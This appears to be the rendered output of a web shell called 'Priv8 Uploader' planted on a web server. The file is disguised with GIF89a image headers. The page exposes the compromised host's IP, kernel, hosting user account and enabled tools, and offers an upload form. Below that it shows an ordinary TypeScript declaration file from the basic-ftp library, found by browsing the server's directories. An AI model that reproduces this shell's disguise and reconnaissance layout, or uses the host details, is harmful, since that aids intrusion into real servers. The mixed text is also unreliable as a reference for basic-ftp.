GIF89a;
GIF89a;Priv8 Uploader By InMyMine7
Linux gallant-poincare.82-165-91-112.plesk.page 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64
Priv8 Uploader By InMyMine7
Linux gallant-poincare.82-165-91-112.plesk.page 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64
| Server IP : 82.165.91.112 / Your IP : 216.73.217.79 Web Server : Apache System : Linux gallant-poincare.82-165-91-112.plesk.page 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64 User : nr7.net_tfpqq467gv ( 10001) PHP Version : 8.4.25 Disable Function : opcache_get_status MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/vhosts/nr7.net/check.nr7.net/node_modules/basic-ftp/dist/ |
Upload File : |
/// <reference types="node" />
import { Socket } from "net";
export type ProgressType = "upload" | "download" | "list";
/**
* Describes progress of file transfer.
*/
export interface ProgressInfo {
/** A name describing this info, e.g. the filename of the transfer. */
readonly name: string;
/** The type of transfer, typically "upload" or "download". */
readonly type: ProgressType;
/** Transferred bytes in current transfer. */
readonly bytes: number;
/** Transferred bytes since last counter reset. Useful for tracking multiple transfers. */
readonly bytesOverall: number;
}
export type ProgressHandler = (info: ProgressInfo) => void;
/**
* Tracks progress of one socket data transfer at a time.
*/
export declare class ProgressTracker {
bytesOverall: number;
protected readonly intervalMs = 500;
protected onStop: (stopWithUpdate: boolean) => void;
protected onHandle: ProgressHandler;
/**
* Register a new handler for progress info. Use `undefined` to disable reporting.
*/
reportTo(onHandle?: ProgressHandler): void;
/**
* Start tracking transfer progress of a socket.
*
* @param socket The socket to observe.
* @param name A name associated with this progress tracking, e.g. a filename.
* @param type The type of the transfer, typically "upload" or "download".
*/
start(socket: Socket, name: string, type: ProgressType): void;
/**
* Stop tracking transfer progress.
*/
stop(): void;
/**
* Call the progress handler one more time, then stop tracking.
*/
updateAndStop(): void;
}